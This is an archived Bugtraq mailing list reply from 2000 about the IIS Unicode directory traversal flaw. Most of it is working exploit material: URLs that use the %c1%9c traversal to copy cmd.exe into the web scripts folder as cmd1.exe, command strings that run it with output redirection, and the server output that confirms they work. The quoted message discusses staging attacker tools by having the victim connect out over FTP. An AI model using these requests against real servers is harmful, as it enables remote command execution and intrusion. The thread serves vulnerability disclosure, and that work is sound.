Bugtraq mailing list archives

Re: IIS Unicode

From: Nsfocus Security Team <security () NSFOCUS COM>
Date: Wed, 25 Oct 2000 16:12:13 +0800

If we copy and rename "cmd.exe" to another filename , the limit can be bypassed.

(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe"

http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe

IIS returned :

"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:


        1 file(s) copied."


(2) run "cmd1.exe /c echo abc >aaa & dir & type aaa "

http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa

IIS returned :

" Directory of c:\inetpub\scripts

10/25/2000  03:48p      <DIR>          .
10/25/2000  03:48p      <DIR>          ..
10/25/2000  03:51p                   6 aaa
12/07/1999  05:00a             236,304 cmd1.exe
..
abc
"

---Original Message---

Bugtraq ID 1806,
http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:

I was having problems executing a command that contains a redirect (>) using
any of the IIS Unicode exploits (including my own exploits on security focus
;) ). If anyone can get a redirect working, please let me know. In order to get
some interesting tools on the victim, you would probably want to have the
victim to FTP to the attacker. Problem without redirect is that you cannot
build the FTP command file, and you are a bit stuck.

[snip]

------------------------------------------------------
Roelof W Temmingh              SensePost IT security



Regards,
Nsfocus Security Team <security () nsfocus com>
http://www.nsfocus.com

Current thread:

IIS Unicode Roelof Temmingh (Oct 25)
- Re: IIS Unicode Ryan Yagatich (Oct 26)
- <Possible follow-ups>
- Re: IIS Unicode Nsfocus Security Team (Oct 26)